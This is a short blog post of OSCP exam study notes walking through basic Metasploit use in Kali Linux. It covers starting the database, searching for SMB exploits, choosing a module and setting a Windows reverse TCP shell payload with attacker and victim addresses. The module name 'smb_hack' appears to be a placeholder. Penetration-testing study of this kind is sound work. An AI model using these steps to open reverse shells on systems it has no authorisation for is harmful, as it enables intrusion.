metasploit photo These are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.

Use Kali Linux for all the following instructions.

Prep:
Ensure postgresql is running.

$> /etc/init.d/postgresql start

Set postgres to start on boot so you don’t have to worry about it again:

$> sudo update-rc.d postgresql enable

From the command line, fire up the Metasploit console:

$> msfconsole

Search for exploits related to what you are interested in:

msf> search smb

Or, be more specific:

msf> search name:smb type:exploit platform:windows

Or, in Kali, use searchsploit (from regular command line, outside of MSF):

$> searchsploit smb

Once you find an exploit you want to use, use it:

msf> use exploit/windows/smb_hack

Then set a payload:

msf> set PAYLOAD windows/shell/reverse_tcp

See what options are set:

msf> show options

Set options as needed:

LHOST is the IP of where the victim host will send info to (your Kali VM, ex.)

msf> set LHOST 192.168.0.x

RHOST is the IP of the victim

msf> set RHOST 192.168.1.x

Default port is 80, but choose one if you wish:

msf> set RPORT 8081

Run the exploit:

msf> exploit

If trying to get a remote shell, beware that you may be looking at it if you see what you think is nothing happening. Just try executing a command and see what happens:

ls

dir

pwd

id

Photos by Christiaan008,